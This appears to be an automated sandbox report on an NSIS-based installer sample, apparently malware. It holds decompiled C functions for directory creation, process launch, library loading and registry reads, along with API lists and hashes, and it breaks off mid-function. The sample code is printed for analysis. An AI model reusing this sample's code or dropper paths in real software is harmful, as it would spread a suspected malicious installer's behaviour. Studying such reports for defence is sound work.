                                                                          				void* _t25;
                                                                          				signed char _t26;
                                                                          				short _t28;
                                                                          				short _t31;
                                                                          				short* _t34;
                                                                          				void* _t36;
                                                                          
                                                                          				_t28 = __ebx;
                                                                          				 *(_t36 + 8) = E00402C37(0xfffffff0);
                                                                          				_t17 = E00405BFE(_t16);
                                                                          				_t32 = _t17;
                                                                          				if(_t17 != __ebx) {
                                                                          					do {
                                                                          						_t34 = E00405B80(_t32, 0x5c);
                                                                          						_t31 =  *_t34;
                                                                          						 *_t34 = _t28;
                                                                          						if(_t31 != _t28) {
                                                                          							L5:
                                                                          							_t25 = E00405832( *(_t36 + 8));
                                                                          						} else {
                                                                          							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
                                                                          							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E0040584F(_t42) == 0) {
                                                                          								goto L5;
                                                                          							} else {
                                                                          								_t25 = E004057B5( *(_t36 + 8)); // executed
                                                                          							}
                                                                          						}
                                                                          						if(_t25 != _t28) {
                                                                          							if(_t25 != 0xb7) {
                                                                          								L9:
                                                                          								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                          							} else {
                                                                          								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                          								if((_t26 & 0x00000010) == 0) {
                                                                          									goto L9;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          						 *_t34 = _t31;
                                                                          						_t32 = _t34 + 2;
                                                                          					} while (_t31 != _t28);
                                                                          				}
                                                                          				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
                                                                          					_push(0xfffffff5);
                                                                          					E00401423();
                                                                          				} else {
                                                                          					E00401423(0xffffffe6);
                                                                          					E00406282(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry\\Agrafferne",  *(_t36 + 8));
                                                                          					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                          					if(_t23 == 0) {
                                                                          						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                          					}
                                                                          				}
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                                                          				return 0;
                                                                          			}












                                                                          APIs
                                                                            • Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75523420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75523420,00000000), ref: 00405C0C
                                                                            • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                            • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                            • Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne,?,00000000,000000F0), ref: 0040164D
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne, xrefs: 00401640
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne
                                                                          • API String ID: 1892508949-282784380
                                                                          • Opcode ID: 73225eed0d1f65cb901f8f6d18868916e3c95e296cac37f30907a214286dc7a5
                                                                          • Instruction ID: f4fc84295b44ed4b17ac4e1ae603b231d2bd930c419d474b78473434f223dd35
                                                                          • Opcode Fuzzy Hash: 73225eed0d1f65cb901f8f6d18868916e3c95e296cac37f30907a214286dc7a5
                                                                          • Instruction Fuzzy Hash: 7711BE31504104ABCF316FA4CD01AAF36A0EF14368B28493BEA45B22F1DB3E4E519A4E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 53%
                                                                          			E00405C5B(void* __eflags, intOrPtr _a4) {
                                                                          				int _t11;
                                                                          				signed char* _t12;
                                                                          				long _t16;
                                                                          				intOrPtr _t18;
                                                                          				intOrPtr* _t21;
                                                                          				signed int _t23;
                                                                          
                                                                          				E00406282(0x42fa50, _a4);
                                                                          				_t21 = E00405BFE(0x42fa50);
                                                                          				if(_t21 != 0) {
                                                                          					E00406516(_t21);
                                                                          					if(( *0x434efc & 0x00000080) == 0) {
                                                                          						L5:
                                                                          						_t23 = _t21 - 0x42fa50 >> 1;
                                                                          						while(1) {
                                                                          							_t11 = lstrlenW(0x42fa50);
                                                                          							_push(0x42fa50);
                                                                          							if(_t11 <= _t23) {
                                                                          								break;
                                                                          							}
                                                                          							_t12 = E004065C5();
                                                                          							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                          								E00405B9F(0x42fa50);
                                                                          								continue;
                                                                          							} else {
                                                                          								goto L1;
                                                                          							}
                                                                          						}
                                                                          						E00405B53();
                                                                          						_t16 = GetFileAttributesW(??); // executed
                                                                          						return 0 | _t16 != 0xffffffff;
                                                                          					}
                                                                          					_t18 =  *_t21;
                                                                          					if(_t18 == 0 || _t18 == 0x5c) {
                                                                          						goto L1;
                                                                          					} else {
                                                                          						goto L5;
                                                                          					}
                                                                          				}
                                                                          				L1:
                                                                          				return 0;
                                                                          			}










                                                                          APIs
                                                                            • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                            • Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75523420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75523420,00000000), ref: 00405C0C
                                                                            • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                            • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                                          • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,75523420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75523420,00000000), ref: 00405CB4
                                                                          • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,75523420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75523420), ref: 00405CC4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                          • String ID: C:\
                                                                          • API String ID: 3248276644-3404278061
                                                                          • Opcode ID: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                                          • Instruction ID: 85ea7651a51856ee7c4c0712bbf35357d52fdd33bb29f336d43f3a771a20a055
                                                                          • Opcode Fuzzy Hash: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                                          • Instruction Fuzzy Hash: 0DF0F925109F5215F622323A1D09EAF2554CF83368716463FF952B16D5DA3C99038D7D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00405867(WCHAR* _a4) {
                                                                          				struct _PROCESS_INFORMATION _v20;
                                                                          				int _t7;
                                                                          
                                                                          				0x430250->cb = 0x44;
                                                                          				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430250,  &_v20); // executed
                                                                          				if(_t7 != 0) {
                                                                          					CloseHandle(_v20.hThread);
                                                                          					return _v20.hProcess;
                                                                          				}
                                                                          				return _t7;
                                                                          			}






                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                          • CloseHandle.KERNEL32(?), ref: 0040589D
                                                                          Strings
                                                                          • Error launching installer, xrefs: 0040587A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcess
                                                                          • String ID: Error launching installer
                                                                          • API String ID: 3712363035-66219284
                                                                          • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                          • Instruction ID: d54ab7d3c02f92ec190dfac26e1bcd6e14271da7ed0e34d6283108f8b7c5a0e7
                                                                          • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                          • Instruction Fuzzy Hash: D4E09AB5900209BFEB109F65DD49F7B77ACEB04744F004565BD50F2150D778D8148A78
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 60%
                                                                          			E0040202C(void* __ebx, void* __eflags) {
                                                                          				struct HINSTANCE__* _t23;
                                                                          				struct HINSTANCE__* _t31;
                                                                          				void* _t32;
                                                                          				void* _t34;
                                                                          				WCHAR* _t37;
                                                                          				intOrPtr* _t38;
                                                                          				void* _t39;
                                                                          
                                                                          				_t32 = __ebx;
                                                                          				asm("sbb eax, 0x434fb8");
                                                                          				 *(_t39 - 4) = 1;
                                                                          				if(__eflags < 0) {
                                                                          					_push(0xffffffe7);
                                                                          					L15:
                                                                          					E00401423();
                                                                          					L16:
                                                                          					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                          					return 0;
                                                                          				}
                                                                          				_t37 = E00402C37(0xfffffff0);
                                                                          				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37(1);
                                                                          				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
                                                                          					L3:
                                                                          					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
                                                                          					 *(_t39 + 8) = _t23;
                                                                          					if(_t23 == _t32) {
                                                                          						_push(0xfffffff6);
                                                                          						goto L15;
                                                                          					}
                                                                          					L4:
                                                                          					_t38 = E004066CB( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
                                                                          					if(_t38 == _t32) {
                                                                          						E004052E6(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
                                                                          					} else {
                                                                          						 *(_t39 - 4) = _t32;
                                                                          						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
                                                                          							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cdd4, 0x40a000); // executed
                                                                          						} else {
                                                                          							E00401423( *((intOrPtr*)(_t39 - 0x20)));
                                                                          							if( *_t38() != 0) {
                                                                          								 *(_t39 - 4) = 1;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E00403930( *(_t39 + 8)) != 0) {
                                                                          						FreeLibrary( *(_t39 + 8));
                                                                          					}
                                                                          					goto L16;
                                                                          				}
                                                                          				_t31 = GetModuleHandleW(_t37); // executed
                                                                          				 *(_t39 + 8) = _t31;
                                                                          				if(_t31 != __ebx) {
                                                                          					goto L4;
                                                                          				}
                                                                          				goto L3;
                                                                          			}











                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                            • Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,0040325E), ref: 00405341
                                                                            • Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll), ref: 00405353
                                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                          • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                          • String ID:
                                                                          • API String ID: 334405425-0
                                                                          • Opcode ID: a69309817c85ba968541a9951c146186ac4bb7107100abfe604f96daf0412f93
                                                                          • Instruction ID: 42f79ed1eba5b951ee52ea84f7896f3e8cd2b7b6c2435203e6ffc1da5cb37fd9
                                                                          • Opcode Fuzzy Hash: a69309817c85ba968541a9951c146186ac4bb7107100abfe604f96daf0412f93
                                                                          • Instruction Fuzzy Hash: EF21C271900208EACF20AFA5CE4DAAE7A70AF04358F64413BF611B51E0DBBD8941DA5E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 59%
                                                                          			E00401B71(void* __ebx) {
                                                                          				intOrPtr _t8;
                                                                          				void* _t9;
                                                                          				void _t12;
                                                                          				void* _t14;
                                                                          				void* _t22;
                                                                          				void* _t25;
                                                                          				void* _t30;
                                                                          				void* _t33;
                                                                          				void* _t34;
                                                                          				char* _t36;
                                                                          				void* _t37;
                                                                          
                                                                          				_t28 = __ebx;
                                                                          				_t8 =  *((intOrPtr*)(_t37 - 0x20));
                                                                          				_t30 =  *0x40cdd4; // 0x0
                                                                          				if(_t8 == __ebx) {
                                                                          					if( *((intOrPtr*)(_t37 - 0x24)) == __ebx) {
                                                                          						_t9 = GlobalAlloc(0x40, 0x804); // executed
                                                                          						_t34 = _t9;
                                                                          						_t5 = _t34 + 4; // 0x4
                                                                          						E004062A4(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x28)));
                                                                          						_t12 =  *0x40cdd4; // 0x0
                                                                          						 *_t34 = _t12;
                                                                          						 *0x40cdd4 = _t34;
                                                                          					} else {
                                                                          						if(_t30 == __ebx) {
                                                                          							 *((intOrPtr*)(_t37 - 4)) = 1;
                                                                          						} else {
                                                                          							_t3 = _t30 + 4; // 0x4
                                                                          							E00406282(_t33, _t3);
                                                                          							_push(_t30);
                                                                          							 *0x40cdd4 =  *_t30;
                                                                          							GlobalFree();
                                                                          						}
                                                                          					}
                                                                          					goto L15;
                                                                          				} else {
                                                                          					while(1) {
                                                                          						_t8 = _t8 - 1;
                                                                          						if(_t30 == _t28) {
                                                                          							break;
                                                                          						}
                                                                          						_t30 =  *_t30;
                                                                          						if(_t8 != _t28) {
                                                                          							continue;
                                                                          						} else {
                                                                          							if(_t30 == _t28) {
                                                                          								break;
                                                                          							} else {
                                                                          								_t32 = _t30 + 4;
                                                                          								_t36 = L"Call";
                                                                          								E00406282(_t36, _t30 + 4);
                                                                          								_t22 =  *0x40cdd4; // 0x0
                                                                          								E00406282(_t32, _t22 + 4);
                                                                          								_t25 =  *0x40cdd4; // 0x0
                                                                          								_push(_t36);
                                                                          								_push(_t25 + 4);
                                                                          								E00406282();
                                                                          								L15:
                                                                          								 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t37 - 4));
                                                                          								_t14 = 0;
                                                                          							}
                                                                          						}
                                                                          						goto L17;
                                                                          					}
                                                                          					_push(0x200010);
                                                                          					_push(E004062A4(_t28, _t30, _t33, _t28, 0xffffffe8));
                                                                          					E004058E4();
                                                                          					_t14 = 0x7fffffff;
                                                                          				}
                                                                          				L17:
                                                                          				return _t14;
                                                                          			}















                                                                          APIs
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00401BE1
                                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree
                                                                          • String ID: Call
                                                                          • API String ID: 3394109436-1824292864
                                                                          • Opcode ID: 4d724161d6c5fb6bf4308d59b78a47a2fd90d80afd9eda06c823efa961cbcd01
                                                                          • Instruction ID: 92ace51ac37ea5806125e07fe733601b5cdc010b72bea360b2f02f73c4ad7c89
                                                                          • Opcode Fuzzy Hash: 4d724161d6c5fb6bf4308d59b78a47a2fd90d80afd9eda06c823efa961cbcd01
                                                                          • Instruction Fuzzy Hash: 4921C072A01100DFDB20EB94CE8495A76A9AF44318725013BF902F72D1DA78A9519B5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00402253() {
                                                                          				WCHAR* _t34;
                                                                          				WCHAR* _t37;
                                                                          				WCHAR* _t39;
                                                                          				void* _t41;
                                                                          
                                                                          				_t39 = E00402C37(_t34);
                                                                          				_t37 = E00402C37(0x11);
                                                                          				 *((intOrPtr*)(_t41 + 8)) = E00402C37(0x23);
                                                                          				if(E004065C5(_t39) != 0) {
                                                                          					 *(_t41 - 0x68) =  *(_t41 - 8);
                                                                          					 *((intOrPtr*)(_t41 - 0x64)) = 2;
                                                                          					 *((short*)(_t39 + 2 + lstrlenW(_t39) * 2)) = _t34;
                                                                          					 *((short*)(_t37 + 2 + lstrlenW(_t37) * 2)) = _t34;
                                                                          					_t27 =  *((intOrPtr*)(_t41 + 8));
                                                                          					 *(_t41 - 0x60) = _t39;
                                                                          					 *(_t41 - 0x5c) = _t37;
                                                                          					 *((intOrPtr*)(_t41 - 0x4e)) =  *((intOrPtr*)(_t41 + 8));
                                                                          					 *((short*)(_t41 - 0x58)) =  *((intOrPtr*)(_t41 - 0x20));
                                                                          					E004052E6(_t34, _t27);
                                                                          					if(SHFileOperationW(_t41 - 0x68) != 0) {
                                                                          						goto L1;
                                                                          					}
                                                                          				} else {
                                                                          					L1:
                                                                          					E004052E6(0xfffffff9, _t34); // executed
                                                                          					 *((intOrPtr*)(_t41 - 4)) = 1;
                                                                          				}
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t41 - 4));
                                                                          				return 0;
                                                                          			}








                                                                          APIs
                                                                            • Part of subcall function 004065C5: FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CA4,C:\,C:\,00000000,C:\,C:\,?,?,75523420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75523420), ref: 004065D0
                                                                            • Part of subcall function 004065C5: FindClose.KERNELBASE(00000000), ref: 004065DC
                                                                          • lstrlenW.KERNEL32 ref: 00402293
                                                                          • lstrlenW.KERNEL32(00000000), ref: 0040229E
                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022C7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FileFindlstrlen$CloseFirstOperation
                                                                          • String ID:
                                                                          • API String ID: 1486964399-0
                                                                          • Opcode ID: 100f20cb576f4d253ceaa7ced30c6e41c51c1835eebf70f24b471d5ee0ebf506
                                                                          • Instruction ID: 7b2fc1264b4fb0dc72f9b007f51c651f6a3d170a065e006ef865ab6f7e8bf7d8
                                                                          • Opcode Fuzzy Hash: 100f20cb576f4d253ceaa7ced30c6e41c51c1835eebf70f24b471d5ee0ebf506
                                                                          • Instruction Fuzzy Hash: D6117C71904308AADB10EFF99E49A9EB7B8AF14354F10457FA405FB2D1E6BCD8408B59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 86%
                                                                          			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
                                                                          				void* _t9;
                                                                          				int _t10;
                                                                          				long _t13;
                                                                          				int* _t16;
                                                                          				intOrPtr _t21;
                                                                          				void* _t22;
                                                                          				short* _t24;
                                                                          				void* _t26;
                                                                          				void* _t29;
                                                                          
                                                                          				_t24 = __esi;
                                                                          				_t21 = __edx;
                                                                          				_t16 = __ebx;
                                                                          				_t9 = E00402C77(_t29, 0x20019); // executed
                                                                          				_t22 = _t9;
                                                                          				_t10 = E00402C15(3);
                                                                          				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
                                                                          				 *__esi = __ebx;
                                                                          				if(_t22 == __ebx) {
                                                                          					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                          				} else {
                                                                          					 *(_t26 + 8) = 0x3ff;
                                                                          					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
                                                                          						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
                                                                          						__eflags = _t13;
                                                                          						if(_t13 != 0) {
                                                                          							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                          						}
                                                                          					} else {
                                                                          						RegEnumKeyW(_t22, _t10, __esi, 0x3ff); // executed
                                                                          					}
                                                                          					_t24[0x3ff] = _t16;
                                                                          					_push(_t22); // executed
                                                                          					RegCloseKey(); // executed
                                                                          				}
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
                                                                          				return 0;
                                                                          			}













                                                                          APIs
                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp,00000000,00000011,00000002), ref: 00402551
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$CloseValue
                                                                          • String ID:
                                                                          • API String ID: 397863658-0
                                                                          • Opcode ID: 02170929fc818fbed94684f01c530bfaabb30566d6e962127c407c103c9f6bc4
                                                                          • Instruction ID: 003629ead7c1dde4a3df59a88d33c100c9cba26094b7a58fe8a243c177e5491d
                                                                          • Opcode Fuzzy Hash: 02170929fc818fbed94684f01c530bfaabb30566d6e962127c407c103c9f6bc4
                                                                          • Instruction Fuzzy Hash: 65018471904104EFE7159FA5DE89ABFB6BCEF44358F10403EF105A61D0DBB84E449B69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 32%
                                                                          			E1000289C(void* __ecx, intOrPtr _a4) {
                                                                          				signed int _v8;
                                                                          				void* _t31;
                                                                          				void* _t32;
                                                                          				int _t36;
                                                                          				void* _t40;
                                                                          				void* _t49;
                                                                          				void* _t54;
                                                                          				void* _t58;
                                                                          				signed int _t65;
                                                                          				void* _t70;
                                                                          				void* _t79;
                                                                          				intOrPtr _t81;
                                                                          				signed int _t88;
                                                                          				intOrPtr _t90;
                                                                          				intOrPtr _t91;
                                                                          				void* _t92;
                                                                          				void* _t94;
                                                                          				void* _t100;
                                                                          				void* _t101;
                                                                          				void* _t102;
                                                                          				void* _t103;
                                                                          				intOrPtr _t106;
                                                                          				intOrPtr _t107;
                                                                          
                                                                          				if( *0x10004050 != 0 && E1000281E(_a4) == 0) {
                                                                          					 *0x10004054 = _t106;
                                                                          					if( *0x1000404c != 0) {
                                                                          						_t106 =  *0x1000404c;
                                                                          					} else {
                                                                          						E10002DE0(E10002818(), __ecx);
                                                                          						 *0x1000404c = _t106;
                                                                          					}
                                                                          				}
                                                                          				_t31 = E1000285A(_a4);
                                                                          				_t107 = _t106 + 4;
                                                                          				if(_t31 <= 0) {
                                                                          					L9:
                                                                          					_t32 = E1000284E();
                                                                          					_t81 = _a4;
                                                                          					_t90 =  *0x10004058;
                                                                          					 *((intOrPtr*)(_t32 + _t81)) = _t90;
                                                                          					 *0x10004058 = _t81;
                                                                          					E10002848();
                                                                          					_t36 = EnumWindows(??, ??); // executed
                                                                          					 *0x10004034 = _t36;
                                                                          					 *0x10004038 = _t90;
                                                                          					if( *0x10004050 != 0 && E1000281E( *0x10004058) == 0) {
                                                                          						 *0x1000404c = _t107;
                                                                          						_t107 =  *0x10004054;
                                                                          					}
                                                                          					_t91 =  *0x10004058;
                                                                          					_a4 = _t91;
                                                                          					 *0x10004058 =  *((intOrPtr*)(E1000284E() + _t91));
                                                                          					_t40 = E1000282C(_t91);
                                                                          					_pop(_t92);
                                                                          					if(_t40 != 0) {
                                                                          						_t49 = E1000285A(_t92);
                                                                          						if(_t49 > 0) {
                                                                          							_push(_t49);
                                                                          							_push(E10002865() + _a4 + _v8);
                                                                          							_push(E1000286F());
                                                                          							if( *0x10004050 <= 0 || E1000281E(_a4) != 0) {
                                                                          								_pop(_t101);
                                                                          								_pop(_t54);
                                                                          								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
                                                                          								}
                                                                          								asm("loop 0xfffffff5");
                                                                          							} else {
                                                                          								_pop(_t102);
                                                                          								_pop(_t58);
                                                                          								 *0x1000404c =  *0x1000404c +  *(_t102 + _t58) * 4;
                                                                          								asm("loop 0xffffffeb");
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					if( *0x10004058 == 0) {
                                                                          						 *0x1000404c = 0;
                                                                          					}
                                                                          					_t94 = _a4 + E10002865();
                                                                          					 *(E10002873() + _t94) =  *0x10004034;
                                                                          					 *((intOrPtr*)(E10002877() + _t94)) =  *0x10004038;
                                                                          					E10002887(_a4);
                                                                          					if(E1000283A() != 0) {
                                                                          						 *0x10004068 = GetLastError();
                                                                          					}
                                                                          					return _a4;
                                                                          				}
                                                                          				_push(E10002865() + _a4);
                                                                          				_t65 = E1000286B();
                                                                          				_v8 = _t65;
                                                                          				_t88 = _t31;
                                                                          				_push(_t77 + _t65 * _t88);
                                                                          				_t79 = E10002877();
                                                                          				_t100 = E10002873();
                                                                          				_t103 = E1000286F();
                                                                          				_t70 = _t88;
                                                                          				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
                                                                          					_push( *((intOrPtr*)(_t79 + _t70)));
                                                                          				}
                                                                          				_push( *((intOrPtr*)(_t100 + _t70)));
                                                                          				asm("loop 0xfffffff1");
                                                                          				goto L9;
                                                                          			}



























                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: EnumErrorLastWindows
                                                                          • String ID:
                                                                          • API String ID: 14984897-0
                                                                          • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                          • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                                          • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                          • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 84%
                                                                          			E0040247E(int* __ebx, char* __esi) {
                                                                          				void* _t17;
                                                                          				short* _t18;
                                                                          				void* _t33;
                                                                          				void* _t37;
                                                                          				void* _t40;
                                                                          
                                                                          				_t35 = __esi;
                                                                          				_t27 = __ebx;
                                                                          				_t17 = E00402C77(_t40, 0x20019); // executed
                                                                          				_t33 = _t17;
                                                                          				_t18 = E00402C37(0x33);
                                                                          				 *__esi = __ebx;
                                                                          				if(_t33 == __ebx) {
                                                                          					 *(_t37 - 4) = 1;
                                                                          				} else {
                                                                          					 *(_t37 - 0x4c) = 0x800;
                                                                          					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c) != 0) {
                                                                          						L7:
                                                                          						 *_t35 = _t27;
                                                                          						 *(_t37 - 4) = 1;
                                                                          					} else {
                                                                          						if( *(_t37 + 8) == 4) {
                                                                          							__eflags =  *(_t37 - 0x18) - __ebx;
